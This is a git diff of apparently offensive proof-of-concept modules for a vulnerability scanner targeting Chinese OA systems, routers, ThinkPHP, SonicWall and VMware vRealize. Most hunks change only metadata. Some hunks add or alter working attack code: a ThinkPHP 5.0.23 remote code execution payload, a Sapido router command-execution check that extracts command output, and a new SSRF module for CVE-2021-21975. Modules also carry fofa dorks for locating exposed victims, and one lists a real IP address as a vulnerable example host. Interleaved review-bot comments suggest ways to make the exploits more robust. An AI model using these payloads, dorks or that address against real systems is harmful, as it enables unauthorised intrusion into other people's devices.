0000000..1f2ca1f Binary files /dev/null and b/poc/Ruijie_锐捷/UPInfo_DisClosure_RG_UAC_CNVD_2021_14536/__pycache__/poc.cpython-38.pyc differ diff --git a/poc/RuoYi_若依/Weak_Pass/__pycache__/poc.cpython-38.pyc b/poc/RuoYi_若依/Weak_Pass/__pycache__/poc.cpython-38.pyc new file mode 100644 index 0000000..5630e5c Binary files /dev/null and b/poc/RuoYi_若依/Weak_Pass/__pycache__/poc.cpython-38.pyc differ 
diff --git a/poc/RuoYi_若依/Weak_Pass/poc.py b/poc/RuoYi_若依/Weak_Pass/poc.py index 236abf9..fe79766 100644 --- a/poc/RuoYi_若依/Weak_Pass/poc.py +++ b/poc/RuoYi_若依/Weak_Pass/poc.py @@ -18,7 +18,7 @@ class POC(POCBase): """, # POC描述,写更新描述,没有就不写 "name" : "若依后台管理系统 弱口令", # 漏洞名称 - "VulnID" : "Blen-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可 + "VulnID" : "oFx-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可 "AppName" : "若依后台管理系统", # 漏洞应用名称 "AppVersion" : "", # 漏洞应用版本 "VulnDate" : "2021-06-09", # 漏洞公开的时间,不知道就写今天,格式:xxxx-xx-xx diff --git a/poc/SANGFOR_深信服/RCE_2020_EDR/__pycache__/poc.cpython-38.pyc b/poc/SANGFOR_深信服/RCE_2020_EDR/__pycache__/poc.cpython-38.pyc new file mode 100644 index 0000000..c70216a Binary files /dev/null and b/poc/SANGFOR_深信服/RCE_2020_EDR/__pycache__/poc.cpython-38.pyc differ diff --git a/poc/SANGFOR_深信服RCE_2020_EDR/poc.py b/poc/SANGFOR_深信服/RCE_2020_EDR/poc.py similarity index 97% rename from poc/SANGFOR_深信服RCE_2020_EDR/poc.py rename to poc/SANGFOR_深信服/RCE_2020_EDR/poc.py index 14d33ec..9acb2d7 100644 --- a/poc/SANGFOR_深信服RCE_2020_EDR/poc.py +++ b/poc/SANGFOR_深信服/RCE_2020_EDR/poc.py @@ -10,7 +10,7 @@ urllib3.disable_warnings() class POC(POCBase): _info = { - "author" : " ", # POC作者 + "author" : "jijue", # POC作者 "version" : "1", # POC版本,默认是1 "CreateDate" : "2022-01-01", # POC创建时间 "UpdateDate" : "2022-01-01", # POC创建时间 @@ -37,7 +37,9 @@ class POC(POCBase): def _verify(self): """ 返回vuln + 存在漏洞:vuln = [True,html_source] # html_source就是页面源码 + 不存在漏洞:vuln = [False,""] """ vuln = [False,""] diff --git a/poc/Samsung/Lfi_Samsung_Wlan_AP/__pycache__/poc.cpython-38.pyc b/poc/Samsung/Lfi_Samsung_Wlan_AP/__pycache__/poc.cpython-38.pyc new file mode 100644 index 0000000..b259b7b Binary files /dev/null and b/poc/Samsung/Lfi_Samsung_Wlan_AP/__pycache__/poc.cpython-38.pyc differ 
diff --git a/poc/Samsung/RCE_Samsung_WLANAP_WEA453e/__pycache__/poc.cpython-38.pyc b/poc/Samsung/RCE_Samsung_WLANAP_WEA453e/__pycache__/poc.cpython-38.pyc new file mode 100644 index 0000000..90076e7 Binary files /dev/null and b/poc/Samsung/RCE_Samsung_WLANAP_WEA453e/__pycache__/poc.cpython-38.pyc differ diff --git a/poc/Samsung/RCE_Samsung_WLANAP_WEA453e/poc.py b/poc/Samsung/RCE_Samsung_WLANAP_WEA453e/poc.py index d2ad2fd..23e7ed3 100644 --- a/poc/Samsung/RCE_Samsung_WLANAP_WEA453e/poc.py +++ b/poc/Samsung/RCE_Samsung_WLANAP_WEA453e/poc.py @@ -18,7 +18,7 @@ class POC(POCBase): """, # POC描述,写更新描述,没有就不写 "name" : "三星 WLAN AP WEA453e路由器 远程命令执行漏洞", # 漏洞名称 - "VulnID" : "Blen-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可 + "VulnID" : "oFx-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可 "AppName" : "三星 WLAN AP WEA453e路由器", # 漏洞应用名称 "AppVersion" : "", # 漏洞应用版本 "VulnDate" : "2021-06-09", # 漏洞公开的时间,不知道就写今天,格式:xxxx-xx-xx diff --git a/poc/Sapido/RCE_BRC70n_Router/__pycache__/poc.cpython-38.pyc b/poc/Sapido/RCE_BRC70n_Router/__pycache__/poc.cpython-38.pyc new file mode 100644 index 0000000..7303e00 Binary files /dev/null and b/poc/Sapido/RCE_BRC70n_Router/__pycache__/poc.cpython-38.pyc differ diff --git a/poc/Sapido/Rce_sapido_BRC70n/poc.py b/poc/Sapido/RCE_BRC70n_Router/poc.py similarity index 81% rename from poc/Sapido/Rce_sapido_BRC70n/poc.py rename to poc/Sapido/RCE_BRC70n_Router/poc.py index 0a1036d..c31e7d9 100644 --- a/poc/Sapido/Rce_sapido_BRC70n/poc.py +++ b/poc/Sapido/RCE_BRC70n_Router/poc.py 
@@ -4,30 +4,37 @@ from lib.core.common import url_handle,get_random_ua from lib.core.poc import POCBase # ... import urllib3 +import re urllib3.disable_warnings() class POC(POCBase): _info = { - "author" : "hansi", # POC作者 + "author" : "hansi && jijue", # POC作者 "version" : "1", # POC版本,默认是1 "CreateDate" : "2022-01-10", # POC创建时间 "UpdateDate" : "2022-01-10", # POC创建时间 "PocDesc" : """ - 略 + v1:略 + v2:该版本对输出做了一定的优化,更简洁 """, # POC描述,写更新描述,没有就不写 - "name" : "sapido BRC70n路由器远程代码执行漏洞", # 漏洞名称 + "name" : "Sapido BRC70n路由器远程代码执行漏洞", # 漏洞名称 "VulnID" : "", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可 "AppName" : "", # 漏洞应用名称 - "AppVersion" : "BR270n-v2.1.03,BRC76n-v2.1.03,GR297-v2.1.3,RB1732-v2.0.43", # 漏洞应用版本 + "AppVersion" : """ + BR270n-v2.1.03, + BRC76n-v2.1.03, + GR297-v2.1.3, + RB1732-v2.0.43 + """, # 漏洞应用版本 "VulnDate" : "2022-01-10", # 漏洞公开的时间,不知道就写今天,格式:xxxx-xx-xx "VulnDesc" : """ """, # 漏洞简要描述 "fofa-dork":""" - app="sapido-路由器" + app="sapido-路由器" """, # fofa搜索语句 "example" : "http://122.116.238.251:1080", # 存在漏洞的演示url,写一个就可以了 "exp_img" : "", # 先不管 @@ -55,7 +62,10 @@ class POC(POCBase): """ req = requests.post(url,headers = headers , data=data,proxies = self.proxy ,timeout = self.timeout,verify = False) if req.status_code ==200 and "Link encap:Ethernet" in req.text: - vuln = [True,req.text] + + result = req.text.split("wrap=\"virtual\">")[1].split("")[0] + + vuln = [True,result] else: vuln = [False,req.text] except Exception as e: diff --git a/poc/SeeYon_致远/File_Download/__pycache__/poc.cpython-38.pyc b/poc/SeeYon_致远/File_Download/__pycache__/poc.cpython-38.pyc new file mode 100644 index 0000000..c26476c Binary files /dev/null and b/poc/SeeYon_致远/File_Download/__pycache__/poc.cpython-38.pyc differ 
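Review bot: `import re` is added at the top of the file, but the code this commit changes (the extraction in the later hunk of this file) uses `str.split`, not `re`; unless another part of the file not shown here uses it, the import is dead and should be dropped. The module-level statements in this hunk are complete, but the `_info` dict continues past the end of the hunk.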
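Review bot: The new extraction `result = req.text.split("wrap=\"virtual\">")[1].split("")[0]` indexes `[1]` without checking that the marker is present, and as this diff is rendered the second separator is the empty string, which makes `str.split` raise `ValueError: empty separator`; either failure escapes through the `except Exception as e:` handler (whose body is outside the hunk) and turns a confirmed positive into an exception instead of a finding. Prefer a partition that degrades to the full body: `head, sep, tail = req.text.partition("wrap=\"virtual\">")` followed by `result = tail.partition(END_TAG)[0] if sep else req.text`, where END_TAG stands for the closing tag this rendering shows as `""` (confirm it against the file). The enclosing `_verify` starts and ends outside the hunk.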
diff --git a/poc/SeeYon_致远/File_Upload_ajax_do/__pycache__/poc.cpython-38.pyc b/poc/SeeYon_致远/File_Upload_ajax_do/__pycache__/poc.cpython-38.pyc new file mode 100644 index 0000000..7ab8a7a Binary files /dev/null and b/poc/SeeYon_致远/File_Upload_ajax_do/__pycache__/poc.cpython-38.pyc differ diff --git a/poc/SeeYon_致远/File_Upload_ajax_do/poc.py b/poc/SeeYon_致远/File_Upload_ajax_do/poc.py index c4dbcc9..7567e3b 100644 --- a/poc/SeeYon_致远/File_Upload_ajax_do/poc.py +++ b/poc/SeeYon_致远/File_Upload_ajax_do/poc.py @@ -18,7 +18,7 @@ class POC(POCBase): """, # POC描述,写更新描述,没有就不写 "name" : "致远OA ajax.do 任意文件上传", # 漏洞名称 - "VulnID" : "Blen-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可 + "VulnID" : "oFx-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可 "AppName" : "致远OA", # 漏洞应用名称 "AppVersion" : """ 致远OA V8.0 diff --git a/poc/ShiZiYu_狮子鱼/Sqli_ApiController/__pycache__/poc.cpython-38.pyc b/poc/ShiZiYu_狮子鱼/Sqli_ApiController/__pycache__/poc.cpython-38.pyc new file mode 100644 index 0000000..c5fdc15 Binary files /dev/null and b/poc/ShiZiYu_狮子鱼/Sqli_ApiController/__pycache__/poc.cpython-38.pyc differ diff --git a/poc/ShiZiYu_狮子鱼/Sqli_ApiController/poc.py b/poc/ShiZiYu_狮子鱼/Sqli_ApiController/poc.py index db8b0e8..d181d4c 100644 --- a/poc/ShiZiYu_狮子鱼/Sqli_ApiController/poc.py +++ b/poc/ShiZiYu_狮子鱼/Sqli_ApiController/poc.py @@ -18,7 +18,7 @@ class POC(POCBase): """, # POC描述,写更新描述,没有就不写 "name" : "狮子鱼CMS ApiController.class.php SQL注入漏洞", # 漏洞名称 - "VulnID" : "Blen-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可 + "VulnID" : "oFx-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可 "AppName" : "狮子鱼CMS", # 漏洞应用名称 "AppVersion" : "", # 漏洞应用版本 "VulnDate" : "2021-06-09", # 漏洞公开的时间,不知道就写今天,格式:xxxx-xx-xx 
diff --git a/poc/ShiZiYu_狮子鱼/Sqli_ApigoodsController/__pycache__/poc.cpython-38.pyc b/poc/ShiZiYu_狮子鱼/Sqli_ApigoodsController/__pycache__/poc.cpython-38.pyc new file mode 100644 index 0000000..27a7e4e Binary files /dev/null and b/poc/ShiZiYu_狮子鱼/Sqli_ApigoodsController/__pycache__/poc.cpython-38.pyc differ diff --git a/poc/ShiZiYu_狮子鱼/Sqli_ApigoodsController/poc.py b/poc/ShiZiYu_狮子鱼/Sqli_ApigoodsController/poc.py index 828c4fd..e50c95c 100644 --- a/poc/ShiZiYu_狮子鱼/Sqli_ApigoodsController/poc.py +++ b/poc/ShiZiYu_狮子鱼/Sqli_ApigoodsController/poc.py @@ -18,7 +18,7 @@ class POC(POCBase): """, # POC描述,写更新描述,没有就不写 "name" : "狮子鱼CMS ApigoodsController.class.php SQL注入漏洞", # 漏洞名称 - "VulnID" : "Blen-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可 + "VulnID" : "oFx-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可 "AppName" : "狮子鱼CMS", # 漏洞应用名称 "AppVersion" : "", # 漏洞应用版本 "VulnDate" : "2021-06-09", # 漏洞公开的时间,不知道就写今天,格式:xxxx-xx-xx diff --git a/poc/ShopXO/FileRead_CNVD_2021_15822/__pycache__/poc.cpython-38.pyc b/poc/ShopXO/FileRead_CNVD_2021_15822/__pycache__/poc.cpython-38.pyc new file mode 100644 index 0000000..e6be89a Binary files /dev/null and b/poc/ShopXO/FileRead_CNVD_2021_15822/__pycache__/poc.cpython-38.pyc differ diff --git a/poc/SonarQube/Info_Disclosure_CVE_2020_27986/__pycache__/poc.cpython-38.pyc b/poc/SonarQube/Info_Disclosure_CVE_2020_27986/__pycache__/poc.cpython-38.pyc new file mode 100644 index 0000000..6e66372 Binary files /dev/null and b/poc/SonarQube/Info_Disclosure_CVE_2020_27986/__pycache__/poc.cpython-38.pyc differ diff --git a/poc/SonicWall_SSL_VPN/RCE_jarrewrite/__pycache__/poc.cpython-38.pyc b/poc/SonicWall_SSL_VPN/RCE_jarrewrite/__pycache__/poc.cpython-38.pyc new file mode 100644 index 0000000..13f055f Binary files /dev/null and b/poc/SonicWall_SSL_VPN/RCE_jarrewrite/__pycache__/poc.cpython-38.pyc differ diff --git a/poc/SonicWall_SSL_VPN/RCE_jarrewrite/poc.py b/poc/SonicWall_SSL_VPN/RCE_jarrewrite/poc.py index 4846283..da4ed88 100644 
--- a/poc/SonicWall_SSL_VPN/RCE_jarrewrite/poc.py +++ b/poc/SonicWall_SSL_VPN/RCE_jarrewrite/poc.py @@ -18,7 +18,7 @@ class POC(POCBase): """, # POC描述,写更新描述,没有就不写 "name" : "SonicWall SSL-VPN 远程命令执行漏洞", # 漏洞名称 - "VulnID" : "Blen-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可 + "VulnID" : "oFx-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可 "AppName" : "SonicWall SSL-VPN", # 漏洞应用名称 "AppVersion" : "", # 漏洞应用版本 "VulnDate" : "2021-06-09", # 漏洞公开的时间,不知道就写今天,格式:xxxx-xx-xx diff --git a/poc/TCC_斗象/Weak_Pass_ARL/__pycache__/poc.cpython-38.pyc b/poc/TCC_斗象/Weak_Pass_ARL/__pycache__/poc.cpython-38.pyc new file mode 100644 index 0000000..6605ce5 Binary files /dev/null and b/poc/TCC_斗象/Weak_Pass_ARL/__pycache__/poc.cpython-38.pyc differ diff --git a/poc/TCC_斗象/Weak_Pass_ARL/poc.py b/poc/TCC_斗象/Weak_Pass_ARL/poc.py index 8aa0353..b1dbfec 100644 --- a/poc/TCC_斗象/Weak_Pass_ARL/poc.py +++ b/poc/TCC_斗象/Weak_Pass_ARL/poc.py @@ -18,7 +18,7 @@ class POC(POCBase): """, # POC描述,写更新描述,没有就不写 "name" : "斗象资产灯塔系统(ARL) 弱口令检测", # 漏洞名称 - "VulnID" : "Blen-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可 + "VulnID" : "oFx-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可 "AppName" : "", # 漏洞应用名称 "AppVersion" : "", # 漏洞应用版本 "VulnDate" : "2021-06-09", # 漏洞公开的时间,不知道就写今天,格式:xxxx-xx-xx diff --git a/poc/TVT_同为股份/Dir_Traversal_NVMS_1000/__pycache__/poc.cpython-38.pyc b/poc/TVT_同为股份/Dir_Traversal_NVMS_1000/__pycache__/poc.cpython-38.pyc new file mode 100644 index 0000000..a89ed27 Binary files /dev/null and b/poc/TVT_同为股份/Dir_Traversal_NVMS_1000/__pycache__/poc.cpython-38.pyc differ diff --git a/poc/TVT_同为股份/Dir_Traversal_NVMS_1000/poc.py b/poc/TVT_同为股份/Dir_Traversal_NVMS_1000/poc.py index 99ccec7..fa82607 100644 --- a/poc/TVT_同为股份/Dir_Traversal_NVMS_1000/poc.py +++ b/poc/TVT_同为股份/Dir_Traversal_NVMS_1000/poc.py 
@@ -18,7 +18,7 @@ class POC(POCBase): """, # POC描述,写更新描述,没有就不写 "name" : "TVT数码科技 NVMS-1000 路径遍历漏洞", # 漏洞名称 - "VulnID" : "Blen-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可 + "VulnID" : "oFx-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可 "AppName" : "NVMS-1000", # 漏洞应用名称 "AppVersion" : "", # 漏洞应用版本 "VulnDate" : "2021-06-09", # 漏洞公开的时间,不知道就写今天,格式:xxxx-xx-xx diff --git a/poc/TamronOS_IPTV/Info_Disclosure/__pycache__/poc.cpython-38.pyc b/poc/TamronOS_IPTV/Info_Disclosure/__pycache__/poc.cpython-38.pyc new file mode 100644 index 0000000..2a26c89 Binary files /dev/null and b/poc/TamronOS_IPTV/Info_Disclosure/__pycache__/poc.cpython-38.pyc differ diff --git a/poc/TamronOS_IPTV/Info_Disclosure/poc.py b/poc/TamronOS_IPTV/Info_Disclosure/poc.py index a65599c..4215c17 100644 --- a/poc/TamronOS_IPTV/Info_Disclosure/poc.py +++ b/poc/TamronOS_IPTV/Info_Disclosure/poc.py @@ -18,7 +18,7 @@ class POC(POCBase): """, # POC描述,写更新描述,没有就不写 "name" : "TamronOS IPTV系统 后台配置敏感信息", # 漏洞名称 - "VulnID" : "Blen-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可 + "VulnID" : "oFx-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可 "AppName" : "TamronOS IPTV系统", # 漏洞应用名称 "AppVersion" : "", # 漏洞应用版本 "VulnDate" : "2021-06-09", # 漏洞公开的时间,不知道就写今天,格式:xxxx-xx-xx diff --git a/poc/TamronOS_IPTV/RCE_api_ping/__pycache__/poc.cpython-38.pyc b/poc/TamronOS_IPTV/RCE_api_ping/__pycache__/poc.cpython-38.pyc new file mode 100644 index 0000000..bec6c74 Binary files /dev/null and b/poc/TamronOS_IPTV/RCE_api_ping/__pycache__/poc.cpython-38.pyc differ diff --git a/poc/TamronOS_IPTV/RCE_api_ping/poc.py b/poc/TamronOS_IPTV/RCE_api_ping/poc.py index eba2a7f..f043265 100644 --- a/poc/TamronOS_IPTV/RCE_api_ping/poc.py +++ b/poc/TamronOS_IPTV/RCE_api_ping/poc.py 
@@ -18,7 +18,7 @@ class POC(POCBase): """, # POC描述,写更新描述,没有就不写 "name" : "TamronOS IPTV系统存在前台命令执行漏洞", # 漏洞名称 - "VulnID" : "Blen-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可 + "VulnID" : "oFx-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可 "AppName" : "TamronOS IPTV系统", # 漏洞应用名称 "AppVersion" : "", # 漏洞应用版本 "VulnDate" : "2021-06-09", # 漏洞公开的时间,不知道就写今天,格式:xxxx-xx-xx diff --git a/poc/TamronOS_IPTV/User_Add_Submit/__pycache__/poc.cpython-38.pyc b/poc/TamronOS_IPTV/User_Add_Submit/__pycache__/poc.cpython-38.pyc new file mode 100644 index 0000000..1e86e69 Binary files /dev/null and b/poc/TamronOS_IPTV/User_Add_Submit/__pycache__/poc.cpython-38.pyc differ diff --git a/poc/TamronOS_IPTV/User_Add_Submit/poc.py b/poc/TamronOS_IPTV/User_Add_Submit/poc.py index e1b546c..71d34fc 100644 --- a/poc/TamronOS_IPTV/User_Add_Submit/poc.py +++ b/poc/TamronOS_IPTV/User_Add_Submit/poc.py @@ -18,7 +18,7 @@ class POC(POCBase): """, # POC描述,写更新描述,没有就不写 "name" : "TamronOS IPTV系统 submit 任意用户创建漏洞", # 漏洞名称 - "VulnID" : "Blen-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可 + "VulnID" : "oFx-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可 "AppName" : "TamronOS IPTV系统", # 漏洞应用名称 "AppVersion" : "None", # 漏洞应用版本 "VulnDate" : "2021-06-09", # 漏洞公开的时间,不知道就写今天,格式:xxxx-xx-xx diff --git a/poc/Thinkphp/RCE_5022_5129/__pycache__/poc.cpython-38.pyc b/poc/Thinkphp/RCE_5022_5129/__pycache__/poc.cpython-38.pyc new file mode 100644 index 0000000..47ef691 Binary files /dev/null and b/poc/Thinkphp/RCE_5022_5129/__pycache__/poc.cpython-38.pyc differ diff --git a/poc/Thinkphp/RCE_5022_5129/poc.py b/poc/Thinkphp/RCE_5022_5129/poc.py index c343be7..193256f 100644 --- a/poc/Thinkphp/RCE_5022_5129/poc.py +++ b/poc/Thinkphp/RCE_5022_5129/poc.py 
@@ -18,7 +18,7 @@ class POC(POCBase):
 """, # POC描述,写更新描述,没有就不写
 "name" : "ThinkPHP5 5.0.22/5.1.29 远程代码执行漏洞", # 漏洞名称
- "VulnID" : "Blen-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可
+ "VulnID" : "oFx-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可
 "AppName" : "ThinkPHP5", # 漏洞应用名称
 "AppVersion" : "ThinkPHP5 5.0.22/5.1.29", # 漏洞应用版本
 "VulnDate" : "2021-06-09", # 漏洞公开的时间,不知道就写今天,格式:xxxx-xx-xx
diff --git a/poc/Thinkphp/RCE_5023/__pycache__/poc.cpython-38.pyc b/poc/Thinkphp/RCE_5023/__pycache__/poc.cpython-38.pyc
new file mode 100644
index 0000000..258683c
Binary files /dev/null and b/poc/Thinkphp/RCE_5023/__pycache__/poc.cpython-38.pyc differ
diff --git a/poc/Thinkphp/RCE_5023/poc.py b/poc/Thinkphp/RCE_5023/poc.py
index f4229f5..42cbfd4 100644
--- a/poc/Thinkphp/RCE_5023/poc.py
+++ b/poc/Thinkphp/RCE_5023/poc.py
@@ -18,7 +18,7 @@ class POC(POCBase):
 """, # POC描述,写更新描述,没有就不写
 "name" : "ThinkPHP5 5.0.23 远程代码执行漏洞", # 漏洞名称
- "VulnID" : "Blen-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可
+ "VulnID" : "oFx-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可
 "AppName" : "ThinkPHP5", # 漏洞应用名称
 "AppVersion" : "ThinkPHP5 <= 5.0.23", # 漏洞应用版本
 "VulnDate" : "2021-06-09", # 漏洞公开的时间,不知道就写今天,格式:xxxx-xx-xx
@@ -45,8 +45,9 @@ class POC(POCBase):
 """
 vuln = [False,""]
 url = self.target + "/index.php?s=captcha" # url自己按需调整
- data = "_method=__construct&filter[]=phpinfo&method=get&server[REQUEST_METHOD]=-1"
-
+ # data = "_method=__construct&filter[]=phpinfo&method=get&server[REQUEST_METHOD]=-1"
+ data = "_method=__construct&method=get&filter=call_user_func&get[]=phpinfo"
+
 headers = {"User-Agent":get_random_ua(),
 "Connection":"close",
 "Content-Type": "application/x-www-form-urlencoded",
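Review bot: The superseded payload is kept as a commented-out line directly above the new `data` assignment (`# data = "_method=__construct&filter[]=phpinfo&method=get&server[REQUEST_METHOD]=-1"`), so the next reader cannot tell whether it is an alternative to try or dead history. The repository's own metadata convention, visible in the sibling hunk above (`"PocDesc" : ... # POC描述,写更新描述`), is that the reason for an update goes into `PocDesc` with `UpdateDate` bumped; record the switch to the `call_user_func`/`get[]` form there and delete the commented line. Both metadata fields and the rest of `_verify` lie outside this hunk.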
@@ -57,10 +58,7 @@ class POC(POCBase):
 检测逻辑,漏洞存在则修改vuln值为True,漏洞不存在则不动
 """
 req = requests.post(url,data = data,headers = headers , proxies = self.proxy ,timeout = self.timeout,verify = False)
- if "PHP Version" in req.text and \
- "Configure Command" in req.text and \
- "phpinfo()" in req.text and \
- req.status_code == 200:
+ if "phpinfo()" in req.text and req.status_code == 200:
 vuln = [True,req.text]
 else:
 vuln = [False,req.text]
diff --git a/poc/Tongda_通达OA/AnyUser_Login_Version2017/__pycache__/poc.cpython-38.pyc b/poc/Tongda_通达OA/AnyUser_Login_Version2017/__pycache__/poc.cpython-38.pyc
new file mode 100644
index 0000000..42aa3dc
Binary files /dev/null and b/poc/Tongda_通达OA/AnyUser_Login_Version2017/__pycache__/poc.cpython-38.pyc differ
diff --git a/poc/Tongda_通达OA/AnyUser_Login_Version2017/poc.py b/poc/Tongda_通达OA/AnyUser_Login_Version2017/poc.py
index 93b5fd4..bc2a449 100644
--- a/poc/Tongda_通达OA/AnyUser_Login_Version2017/poc.py
+++ b/poc/Tongda_通达OA/AnyUser_Login_Version2017/poc.py
@@ -36,7 +36,9 @@ class POC(POCBase):
 def _verify(self):
 """
 返回vuln
+
 存在漏洞:vuln = [True,html_source] # html_source就是页面源码
+
 不存在漏洞:vuln = [False,""]
 """
 vuln = [False,""]
diff --git a/poc/Tongda_通达OA/Computer_Name_Plugin/__pycache__/poc.cpython-38.pyc b/poc/Tongda_通达OA/Computer_Name_Plugin/__pycache__/poc.cpython-38.pyc
new file mode 100644
index 0000000..bf4e427
Binary files /dev/null and b/poc/Tongda_通达OA/Computer_Name_Plugin/__pycache__/poc.cpython-38.pyc differ
diff --git a/poc/Tongda_通达OA/Sql_inj_TongDa/__pycache__/poc.cpython-38.pyc b/poc/Tongda_通达OA/Sql_inj_TongDa/__pycache__/poc.cpython-38.pyc
new file mode 100644
index 0000000..64ae945
Binary files /dev/null and b/poc/Tongda_通达OA/Sql_inj_TongDa/__pycache__/poc.cpython-38.pyc differ
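Review bot: The new condition `if "phpinfo()" in req.text and req.status_code == 200:` marks any 200 page that merely contains the token phpinfo() as a confirmed RCE, whereas the three-marker check it replaces (`PHP Version`, `Configure Command`, `phpinfo()`) only matched a rendered phpinfo() page. A framework error trace that prints the called function, a WAF block page or a honeypot can all contain that single token, which is exactly the false-positive class the removed lines guarded against; the `_honeypot_check` that follows is outside this hunk and, being a generic heuristic, is not a substitute. If some targets did not emit all three strings, relax to two rather than one, e.g. `if req.status_code == 200 and "phpinfo()" in req.text and "PHP Version" in req.text:`, and note the reason in `PocDesc`.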
diff --git a/poc/Tongda_通达OA/Version_Info_Plugin/__pycache__/poc.cpython-38.pyc b/poc/Tongda_通达OA/Version_Info_Plugin/__pycache__/poc.cpython-38.pyc new file mode 100644 index 0000000..1a59c7c Binary files /dev/null and b/poc/Tongda_通达OA/Version_Info_Plugin/__pycache__/poc.cpython-38.pyc differ diff --git a/poc/UTT_艾泰科技/WeakPass_Net_Manager_System/__pycache__/poc.cpython-38.pyc b/poc/UTT_艾泰科技/WeakPass_Net_Manager_System/__pycache__/poc.cpython-38.pyc new file mode 100644 index 0000000..bf47d83 Binary files /dev/null and b/poc/UTT_艾泰科技/WeakPass_Net_Manager_System/__pycache__/poc.cpython-38.pyc differ diff --git a/poc/UTT_艾泰科技/WeakPass_Net_Manager_System/poc.py b/poc/UTT_艾泰科技/WeakPass_Net_Manager_System/poc.py index d606918..0d7e4ab 100644 --- a/poc/UTT_艾泰科技/WeakPass_Net_Manager_System/poc.py +++ b/poc/UTT_艾泰科技/WeakPass_Net_Manager_System/poc.py @@ -18,7 +18,7 @@ class POC(POCBase): """, # POC描述,写更新描述,没有就不写 "name" : "艾泰网络管理系统弱口令", # 漏洞名称 - "VulnID" : "Blen-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可 + "VulnID" : "oFx-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可 "AppName" : "艾泰网络管理系统", # 漏洞应用名称 "AppVersion" : "", # 漏洞应用版本 "VulnDate" : "2021-06-09", # 漏洞公开的时间,不知道就写今天,格式:xxxx-xx-xx diff --git a/poc/VMware/File_read_vCenter/__pycache__/poc.cpython-38.pyc b/poc/VMware/File_read_vCenter/__pycache__/poc.cpython-38.pyc new file mode 100644 index 0000000..8989fff Binary files /dev/null and b/poc/VMware/File_read_vCenter/__pycache__/poc.cpython-38.pyc differ diff --git a/poc/VMware/SSRF_vRealize_CVE_2021_21975/__pycache__/poc.cpython-38.pyc b/poc/VMware/SSRF_vRealize_CVE_2021_21975/__pycache__/poc.cpython-38.pyc new file mode 100644 index 0000000..bd9f7fe Binary files /dev/null and b/poc/VMware/SSRF_vRealize_CVE_2021_21975/__pycache__/poc.cpython-38.pyc differ diff --git a/poc/VMware/SSRF_vRealize_CVE_2021_21975/poc.py b/poc/VMware/SSRF_vRealize_CVE_2021_21975/poc.py new file mode 100644 index 0000000..3b473e2 --- /dev/null 
+++ b/poc/VMware/SSRF_vRealize_CVE_2021_21975/poc.py 
@@ -0,0 +1,87 @@
+# coding:utf-8
+import requests
+from lib.core.common import url_handle,get_random_ua,get_ceye_dns,verify_ceye_dns
+from lib.core.poc import POCBase
+# ...
+import urllib3
+urllib3.disable_warnings()
+
+class POC(POCBase):
+
+ _info = {
+ "author" : "jijue", # POC作者
+ "version" : "1", # POC版本,默认是1
+ "CreateDate" : "2021-06-09", # POC创建时间
+ "UpdateDate" : "2021-06-09", # POC创建时间
+ "PocDesc" : """
+ 略
+ """, # POC描述,写更新描述,没有就不写
+
+ "name" : "VMware vRealize Operations Manager SSRF漏洞 CVE-2021-21975", # 漏洞名称
+ "VulnID" : "CVE-2021-21975", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可
+ "AppName" : "VMware vRealize Operations Manager", # 漏洞应用名称
+ "AppVersion" : """
+ VMware:vRealize_operations_manager: 8.0.0, 8.0.1, 8.3.0, 8.1.0, 8.1.1, 8.2.0, 7.5.0
+ VMware:cloud_foundation: 4.x 3.x
+ VMware:vRealize_suite_lifecycle_manager: 8.x
+ """, # 漏洞应用版本
+ "VulnDate" : "2021-06-09", # 漏洞公开的时间,不知道就写今天,格式:xxxx-xx-xx
+ "VulnDesc" : """
+ vRealize Operations Manager API包含服务器端请求伪造。
+ 可以通过网络访问vRealize Operations Manager API的恶意攻击者可以执行服务器端请求伪造攻击(SSRF),以窃取管理凭据。
+ """, # 漏洞简要描述
+
+ "fofa-dork":"""
+ title="vRealize Operations Manager"
+ """, # fofa搜索语句
+ "example" : "", # 存在漏洞的演示url,写一个就可以了
+ "exp_img" : "", # 先不管
+ }
+
+ def _verify(self):
+ """
+ 返回vuln
+
